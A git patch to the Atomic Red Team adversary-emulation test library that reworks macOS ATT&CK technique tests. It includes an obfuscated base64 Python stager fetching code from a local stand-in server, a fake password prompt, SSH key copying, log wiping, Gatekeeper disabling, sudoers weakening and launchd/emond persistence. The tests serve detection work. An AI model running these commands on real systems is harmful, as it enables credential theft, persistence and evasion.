From 83dce0dcfa554aa69b0e2bf93ef541599ae35c1d Mon Sep 17 00:00:00 2001 From: hypnoticpattern <45320229+hypnoticpattern@users.noreply.github.com> Date: Wed, 17 Jun 2020 18:57:14 -0700 Subject: [PATCH] Fix macOS tests (#1059) * Fix macOS tests * Fix typo in T1574.006 * Replaced zsh with bash, add prereq_command * Fix test name in T1053.004 Co-authored-by: Carrie Roberts --- atomics/T1027.001/T1027.001.yaml | 2 +- atomics/T1037.004/T1037.004.yaml | 5 +- atomics/T1040/T1040.yaml | 12 +++- atomics/T1053.004/T1053.004.yaml | 62 ++++++---------- ...am.plist => atomicredteam_T1053_004.plist} | 19 +++-- atomics/T1056.002/T1056.002.yaml | 2 +- atomics/T1059.002/T1059.002.yaml | 2 +- atomics/T1059.003/T1059.003.yaml | 2 +- atomics/T1059.004/T1059.004.yaml | 15 ++-- atomics/T1069.001/T1069.001.yaml | 2 +- atomics/T1083/T1083.yaml | 2 +- atomics/T1087.001/T1087.001.yaml | 2 +- atomics/T1090.001/T1090.001.yaml | 29 ++++++++ atomics/T1136.001/T1136.001.yaml | 2 +- atomics/T1518.001/T1518.001.yaml | 1 + atomics/T1543.001/T1543.001.yaml | 56 +++++++-------- .../src/atomicredteam_T1543_001.plist | 17 +++++ atomics/T1543.004/T1543.004.yaml | 52 ++++++++------ .../src/atomicredteam_T1543_004.plist | 15 ++++ atomics/T1546.014/src/T1546.014_emond.plist | 72 +++++++++---------- atomics/T1547.007/T1547.007.yaml | 5 +- atomics/T1548.003/T1548.003.yaml | 10 +-- atomics/T1551.002/T1551.002.yaml | 5 +- atomics/T1552.001/T1552.001.yaml | 3 +- atomics/T1552.004/T1552.004.yaml | 33 +++++++-- atomics/T1553.001/T1553.001.yaml | 3 +- atomics/T1555.001/T1555.001.yaml | 15 +++- atomics/T1560.001/T1560.001.yaml | 4 +- atomics/T1564.001/T1564.001.yaml | 5 ++ atomics/T1564.002/T1564.002.yaml | 5 +- atomics/T1569.001/T1569.001.yaml | 15 +++- atomics/T1574.006/T1574.006.yaml | 3 +- 32 files changed, 302 insertions(+), 175 deletions(-) rename atomics/T1053.004/src/{atomicredteam.plist => atomicredteam_T1053_004.plist} (56%) create mode 100644 atomics/T1543.001/src/atomicredteam_T1543_001.plist create mode 100644 atomics/T1543.004/src/atomicredteam_T1543_004.plist diff --git a/atomics/T1027.001/T1027.001.yaml b/atomics/T1027.001/T1027.001.yaml index 91329390..2b9e8f1d 100644 --- a/atomics/T1027.001/T1027.001.yaml +++ b/atomics/T1027.001/T1027.001.yaml @@ -22,7 +22,7 @@ atomic_tests: prereq_command: | if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; get_prereq_command: | - cp /bin/ls /tmp/evil-binary + cp /bin/ls #{file_to_pad} executor: command: | dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index dd60024c..8b664b82 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml @@ -11,6 +11,7 @@ atomic_tests: - macos executor: command: | - echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common - name: sh + sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common + elevation_required: true + name: bash diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index 38144e7a..e89014e9 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml @@ -33,10 +33,18 @@ atomic_tests: description: Specify interface to perform PCAP on. type: String default: en0A + dependency_executor_name: /bin/zsh + dependencies: + - description: | + Check if at least one of the tools are installed on the machine. + prereq_command: | + if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; + get_prereq_command: | + echo "Install tcpdump and/or tshark for the test to run."; exit 1; executor: command: | - tcpdump -c 5 -nnni #{interface} - tshark -c 5 -i #{interface} + sudo tcpdump -c 5 -nnni #{interface} + if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi; name: bash elevation_required: true - name: Packet Capture Windows Command Prompt diff --git a/atomics/T1053.004/T1053.004.yaml b/atomics/T1053.004/T1053.004.yaml index bf973427..5e16a975 100644 --- a/atomics/T1053.004/T1053.004.yaml +++ b/atomics/T1053.004/T1053.004.yaml @@ -10,45 +10,25 @@ atomic_tests: supported_platforms: - macos - - linux - + input_arguments: + script_location: + description: evil plist location + type: path + default: $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist + script_destination: + description: Path where to move the evil plist + type: path + default: /etc/emond.d/rules/atomicredteam_T1053_004.plist + empty_file: + description: Random name of the empty file used to trigger emond service + type: string + default: randomflag executor: - name: manual - steps: | - 1. Place this file in /etc/emond.d/rules/atomicredteam.plist - - - - - - name - atomicredteam - enabled - - eventTypes - - startup - - actions - - - command - /usr/bin/say - user - root - arguments - - -v Tessa - I am a persistent startup item. - - type - RunCommand - - - - - - - 2. Place an empty file in /private/var/db/emondClients/ - - 3. sudo touch /private/var/db/emondClients/randomflag \ No newline at end of file + name: bash + elevation_required: true + command: | + sudo cp #{script_location} #{script_destination} + sudo touch /private/var/db/emondClients/#{empty_file} + cleanup_command: | + sudo rm #{script_destination} + sudo rm /private/var/db/emondClients/#{empty_file} diff --git a/atomics/T1053.004/src/atomicredteam.plist b/atomics/T1053.004/src/atomicredteam_T1053_004.plist similarity index 56% rename from atomics/T1053.004/src/atomicredteam.plist rename to atomics/T1053.004/src/atomicredteam_T1053_004.plist index 62bdcff4..082280e2 100644 --- a/atomics/T1053.004/src/atomicredteam.plist +++ b/atomics/T1053.004/src/atomicredteam_T1053_004.plist @@ -4,7 +4,7 @@ name - atomicredteam + com.atomicredteam.t1053_004 enabled eventTypes @@ -15,13 +15,24 @@ command - /usr/bin/say + /usr/bin/sleep user root arguments - -v Tessa - I am a persistent startup item. + 10 + + type + RunCommand + + + command + /usr/bin/touch + user + root + arguments + + /tmp/T1053_004_atomicredteam type RunCommand diff --git a/atomics/T1056.002/T1056.002.yaml b/atomics/T1056.002/T1056.002.yaml index 0254866a..d65f56da 100644 --- a/atomics/T1056.002/T1056.002.yaml +++ b/atomics/T1056.002/T1056.002.yaml @@ -11,7 +11,7 @@ atomic_tests: executor: command: | osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' - name: sh + name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 description: | diff --git a/atomics/T1059.002/T1059.002.yaml b/atomics/T1059.002/T1059.002.yaml index ae0a155f..a86f1a93 100644 --- a/atomics/T1059.002/T1059.002.yaml +++ b/atomics/T1059.002/T1059.002.yaml @@ -13,6 +13,6 @@ atomic_tests: - macos executor: command: | - osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\\\\\\\" | python &\\\"\" + osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\" | python &\"" name: sh diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index 1b047d6a..85f304d8 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -13,7 +13,7 @@ atomic_tests: type: string default: dir script_path: - description: Path of script to create. + description: Script path. type: path default: $env:TEMP\T1059.003_script.bat dependency_executor_name: powershell diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml index a5c2e508..1c67ef01 100644 --- a/atomics/T1059.004/T1059.004.yaml +++ b/atomics/T1059.004/T1059.004.yaml @@ -8,12 +8,19 @@ atomic_tests: supported_platforms: - macos - linux + input_arguments: + script_path: + description: Script path + type: path + default: /tmp/art.sh executor: command: | - sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" - sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" - chmod +x /tmp/art.sh - sh /tmp/art.sh + sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}" + sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}" + chmod +x #{script_path} + sh #{script_path} + cleanup_command: | + rm #{script_path} name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c diff --git a/atomics/T1069.001/T1069.001.yaml b/atomics/T1069.001/T1069.001.yaml index 566d5564..1a050f98 100644 --- a/atomics/T1069.001/T1069.001.yaml +++ b/atomics/T1069.001/T1069.001.yaml @@ -10,7 +10,7 @@ atomic_tests: - linux executor: command: | - if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi; + if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi; if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi; name: sh diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index 3d2fec52..f86c8fcf 100644 --- a/atomics/T1083/T1083.yaml +++ b/atomics/T1083/T1083.yaml @@ -78,7 +78,7 @@ atomic_tests: cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file} if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi; find . -type f -iname *.pdf >> #{output_file} - cat #{output_file}; fi; + cat #{output_file} find . -type f -name ".*" cleanup_command: 'rm #{output_file}' name: sh diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml index 9538c8d8..55e8968a 100644 --- a/atomics/T1087.001/T1087.001.yaml +++ b/atomics/T1087.001/T1087.001.yaml @@ -34,7 +34,7 @@ atomic_tests: default: /tmp/T1087.001.txt executor: command: | - cat /etc/sudoers > #{output_file} + sudo cat /etc/sudoers > #{output_file} cat #{output_file} cleanup_command: | rm -f #{output_file} diff --git a/atomics/T1090.001/T1090.001.yaml b/atomics/T1090.001/T1090.001.yaml index 1e1ada87..8c0f7dec 100644 --- a/atomics/T1090.001/T1090.001.yaml +++ b/atomics/T1090.001/T1090.001.yaml @@ -26,6 +26,35 @@ atomic_tests: unset http_proxy unset https_proxy name: sh +- name: Connection Proxy for macOS UI + description: | + Enable traffic redirection on macOS UI (not terminal). + The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. + + Note that this test may conflict with pre-existing system configuration. + supported_platforms: + - macos + input_arguments: + proxy_server: + description: Proxy server URL (host) + type: string + default: 127.0.0.1 + proxy_port: + description: Proxy server port + type: string + default: 8080 + interface: + description: Protocol to proxy (http or https) + type: string + default: Wi-Fi + executor: + name: sh + command: | + networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port} + networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port} + cleanup_command: | + networksetup -setwebproxystate #{interface} off + networksetup -setsecurewebproxystate #{interface} off - name: portproxy reg key auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a description: | diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml index 39aeb4b6..c555483e 100644 --- a/atomics/T1136.001/T1136.001.yaml +++ b/atomics/T1136.001/T1136.001.yaml @@ -37,7 +37,7 @@ atomic_tests: executor: command: | dscl . -create /Users/#{username} - dscl . -create /Users/#{username} UserShell /bin/bash + dscl . -create /Users/#{username} UserShell /bin/zsh dscl . -create /Users/#{username} RealName "#{realname}" dscl . -create /Users/#{username} UniqueID "1010" dscl . -create /Users/#{username} PrimaryGroupID 80 diff --git a/atomics/T1518.001/T1518.001.yaml b/atomics/T1518.001/T1518.001.yaml index 998cef68..856dfeaf 100644 --- a/atomics/T1518.001/T1518.001.yaml +++ b/atomics/T1518.001/T1518.001.yaml @@ -46,6 +46,7 @@ atomic_tests: command: | ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService + ps aux | grep falcond name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 diff --git a/atomics/T1543.001/T1543.001.yaml b/atomics/T1543.001/T1543.001.yaml index dd555d4f..14771b3d 100644 --- a/atomics/T1543.001/T1543.001.yaml +++ b/atomics/T1543.001/T1543.001.yaml @@ -7,34 +7,32 @@ atomic_tests: Create a plist and execute it supported_platforms: - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist + + dependency_executor_name: bash + dependencies: + - description: | + The shared library must exist on disk at specified location (#{path_to_shared_library}) + prereq_command: | + if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; + get_prereq_command: | + echo "The shared library doesn't exist. Check the path"; exit 1; executor: - steps: | - 1. Create file - .client - - 2. osascript -e 'tell app "Finder" to display dialog "Hello World"' - - 3. Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist - - 4. - - - - - KeepAlive - - Label - com.client.client - ProgramArguments - - /Users//.client - - RunAtLoad - - NSUIElement - 1 - - - - 5. launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist - name: manual + name: bash + elevation_required: true + command: | + if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; + sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} + sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} + cleanup: | + sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} + sudo rm ~/Library/LaunchAgents/#{plist_filename} diff --git a/atomics/T1543.001/src/atomicredteam_T1543_001.plist b/atomics/T1543.001/src/atomicredteam_T1543_001.plist new file mode 100644 index 00000000..3664e1aa --- /dev/null +++ b/atomics/T1543.001/src/atomicredteam_T1543_001.plist @@ -0,0 +1,17 @@ + + + + + Label + com.atomicredteam.t1543_001 + ProgramArguments + + touch + /tmp/T1543_001_atomicredteam.txt + + RunAtLoad + + NSUIElement + 1 + + diff --git a/atomics/T1543.004/T1543.004.yaml b/atomics/T1543.004/T1543.004.yaml index cabccc3f..a806db85 100644 --- a/atomics/T1543.004/T1543.004.yaml +++ b/atomics/T1543.004/T1543.004.yaml @@ -5,26 +5,34 @@ atomic_tests: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: | Utilize LaunchDaemon to launch `Hello World` - supported_platforms: - - macos - executor: - steps: | - 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons - 2. - - - - - Label - com.example.hello - ProgramArguments - - hello - world - - KeepAlive - - - - name: manual + + supported_platforms: + - macos + + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist + dependency_executor_name: bash + dependencies: + - description: | + The shared library must exist on disk at specified location (#{path_to_shared_library}) + prereq_command: | + if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; + get_prereq_command: | + echo "The plist file doesn't exist. Check the path and try again."; exit 1; + executor: + name: bash + elevation_required: true + command: | + sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} + sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} + cleanup: | + sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} + sudo rm /Library/LaunchDaemons/#{plist_filename} diff --git a/atomics/T1543.004/src/atomicredteam_T1543_004.plist b/atomics/T1543.004/src/atomicredteam_T1543_004.plist new file mode 100644 index 00000000..fec42ec6 --- /dev/null +++ b/atomics/T1543.004/src/atomicredteam_T1543_004.plist @@ -0,0 +1,15 @@ + + + + + Label + com.atomicredteam.t1543_004 + ProgramArguments + + touch + /tmp/T1543_004_atomicredteam.txt + + KeepAlive + + + diff --git a/atomics/T1546.014/src/T1546.014_emond.plist b/atomics/T1546.014/src/T1546.014_emond.plist index 69b2b778..ef00a146 100644 --- a/atomics/T1546.014/src/T1546.014_emond.plist +++ b/atomics/T1546.014/src/T1546.014_emond.plist @@ -4,42 +4,40 @@ name - Atomic Red Team T1165 - enabled - - eventTypes - - startup - - actions - - - command - /bin/sleep - user - root - arguments - - 30 - - type - RunCommand - - - command - /usr/bin/say - user - root - arguments - - -v - Karen - Hello from Atomic Red Team technique T1165 - - type - RunCommand - - - + AtomicRedTeam_T1546_014 + enabled + + eventTypes + + startup + + actions + + + command + /usr/bin/sleep + user + root + arguments + + 10 + + type + RunCommand + + + command + /usr/bin/touch + user + root + arguments + + /tmp/T1546_014_atomicredteam + + type + RunCommand + + + diff --git a/atomics/T1547.007/T1547.007.yaml b/atomics/T1547.007/T1547.007.yaml index aeee40dd..69c90673 100644 --- a/atomics/T1547.007/T1547.007.yaml +++ b/atomics/T1547.007/T1547.007.yaml @@ -35,5 +35,8 @@ atomic_tests: executor: command: | sudo defaults write com.apple.loginwindow LoginHook #{script} + cleanup: | sudo defaults delete com.apple.loginwindow LoginHook - name: sh \ No newline at end of file + elevation_required: true + name: sh + \ No newline at end of file diff --git a/atomics/T1548.003/T1548.003.yaml b/atomics/T1548.003/T1548.003.yaml index 149fc83f..a6f671a8 100644 --- a/atomics/T1548.003/T1548.003.yaml +++ b/atomics/T1548.003/T1548.003.yaml @@ -14,11 +14,11 @@ atomic_tests: executor: name: sh + elevation_required: true command: | - sudo -l - sudo su - cat /etc/sudoers - vim /etc/sudoers + sudo -l + sudo cat /etc/sudoers + sudo vim /etc/sudoers - name: Unlimited sudo cache timeout auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc @@ -31,6 +31,7 @@ atomic_tests: executor: name: sh + elevation_required: true command: | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers @@ -46,6 +47,7 @@ atomic_tests: executor: name: sh + elevation_required: true command: | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" sudo visudo -c -f /etc/sudoers \ No newline at end of file diff --git a/atomics/T1551.002/T1551.002.yaml b/atomics/T1551.002/T1551.002.yaml index 2397e36b..e9b1fbfe 100644 --- a/atomics/T1551.002/T1551.002.yaml +++ b/atomics/T1551.002/T1551.002.yaml @@ -10,9 +10,10 @@ atomic_tests: - linux executor: command: | - rm -rf /private/var/log/system.log* - rm -rf /private/var/audit/* + sudo rm -rf /private/var/log/system.log* + sudo rm -rf /private/var/audit/* name: sh + elevation_required: true - name: Overwrite Linux Mail Spool auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4 description: | diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml index 66bb8492..5bd597e8 100644 --- a/atomics/T1552.001/T1552.001.yaml +++ b/atomics/T1552.001/T1552.001.yaml @@ -10,7 +10,8 @@ atomic_tests: executor: command: | python2 laZagne.py all - name: sh + elevation_required: true + name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: | diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index d03bbcbe..91df1ceb 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml @@ -21,14 +21,20 @@ atomic_tests: - macos - linux input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: / output_file: description: Output file containing locations of SSH key files type: path default: /tmp/keyfile_locations.txt executor: command: | - find / -name id_rsa >> #{output_file} - find / -name id_dsa >> #{output_file} + find #{search_path} -name id_rsa >> #{output_file} + find #{search_path} -name id_dsa >> #{output_file} + cleanup_command: | + rm #{output_file} name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 @@ -37,6 +43,10 @@ atomic_tests: supported_platforms: - linux input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: / output_folder: description: Output folder containing copies of SSH private key files type: path @@ -44,8 +54,10 @@ atomic_tests: executor: command: | mkdir #{output_folder} - find / -name id_rsa -exec cp --parents {} #{output_folder} \; - find / -name id_dsa -exec cp --parents {} #{output_folder} \; + find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; + find #{search_path} -name id_dsa -exec cp --parents {} #{output_folder} \; + cleanup_command: | + rm #{output_folder} name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a @@ -55,6 +67,10 @@ atomic_tests: - macos - linux input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: / output_folder: description: Output folder containing copies of SSH private key files type: path @@ -62,6 +78,9 @@ atomic_tests: executor: command: | mkdir #{output_folder} - find / -name id_rsa -exec rsync -R {} #{output_folder} \; - find / -name id_dsa -exec rsync -R {} #{output_folder} \; - name: sh \ No newline at end of file + find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; + find #{search_path} -name id_dsa -exec rsync -R {} #{output_folder} \; + cleanup_command: | + rm -rf #{output_folder} + name: sh + \ No newline at end of file diff --git a/atomics/T1553.001/T1553.001.yaml b/atomics/T1553.001/T1553.001.yaml index 29de7fe1..ed174aa8 100644 --- a/atomics/T1553.001/T1553.001.yaml +++ b/atomics/T1553.001/T1553.001.yaml @@ -16,4 +16,5 @@ atomic_tests: command: | sudo xattr -r -d com.apple.quarantine #{app_path} sudo spctl --master-disable - name: sh \ No newline at end of file + elevation_required: true + name: sh diff --git a/atomics/T1555.001/T1555.001.yaml b/atomics/T1555.001/T1555.001.yaml index cdc9c380..1e53ce65 100644 --- a/atomics/T1555.001/T1555.001.yaml +++ b/atomics/T1555.001/T1555.001.yaml @@ -17,9 +17,18 @@ atomic_tests: [Keychain dumper](https://github.com/juuso/keychaindump) supported_platforms: - macos + input_arguments: + cert_import: + description: Specify the path of the certificates to import. + type: path + default: /tmp/certs.pem + cert_export: + description: Specify the path of the certificates to export. + type: path + default: /tmp/certs.pem executor: command: | security -h - security find-certificate -a -p > allcerts.pem - security import /tmp/certs.pem -k - name: sh \ No newline at end of file + security find-certificate -a -p > #{cert_export} + security import #{cert_export} -k + name: sh diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index f920e406..13a1b1f6 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -153,15 +153,13 @@ atomic_tests: - description: | Files to zip must exist (#{input_files}) prereq_command: | - ls #{input_files} + if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; get_prereq_command: | echo Please set input_files argument to include files that exist executor: name: sh elevation_required: false - prereq_command: | - ls #{input_files} > /dev/null command: | zip #{output_file} #{input_files} cleanup_command: | diff --git a/atomics/T1564.001/T1564.001.yaml b/atomics/T1564.001/T1564.001.yaml index b0ce7692..340a8ca2 100644 --- a/atomics/T1564.001/T1564.001.yaml +++ b/atomics/T1564.001/T1564.001.yaml @@ -100,6 +100,11 @@ atomic_tests: Hide a directory on MacOS supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: /tmp/evil executor: command: | touch /var/tmp/T1564.001_mac.txt diff --git a/atomics/T1564.002/T1564.002.yaml b/atomics/T1564.002/T1564.002.yaml index fc8e8064..de822dc9 100644 --- a/atomics/T1564.002/T1564.002.yaml +++ b/atomics/T1564.002/T1564.002.yaml @@ -15,4 +15,7 @@ atomic_tests: executor: command: | sudo dscl . -create /Users/#{user_name} UniqueID 333 - name: sh \ No newline at end of file + cleanup_command: | + sudo dscl . -delete /Users/#{username} + elevation_required: true + name: sh diff --git a/atomics/T1569.001/T1569.001.yaml b/atomics/T1569.001/T1569.001.yaml index 840b6279..11df555e 100644 --- a/atomics/T1569.001/T1569.001.yaml +++ b/atomics/T1569.001/T1569.001.yaml @@ -7,7 +7,18 @@ atomic_tests: Utilize launchctl supported_platforms: - macos + input_arguments: + executable_path: + description: Path of the executable to run. + type: path + default: /System/Applications/Calculator.app/Contents/MacOS/Calculator + label_name: + description: Path of the executable to run. + type: string + default: evil executor: command: | - launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator - name: sh \ No newline at end of file + launchctl submit -l #{label_name} -- #{executable_path} + cleanup_command: | + launchctl remove #{label_name} + name: bash diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml index c75a5006..399ee53f 100644 --- a/atomics/T1574.006/T1574.006.yaml +++ b/atomics/T1574.006/T1574.006.yaml @@ -29,7 +29,8 @@ atomic_tests: executor: command: | sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload' - cleanup_command: "" + cleanup_command: | + sudo sed -i '/#{path_to_shared_library}/d' /etc/ld.so.preload name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD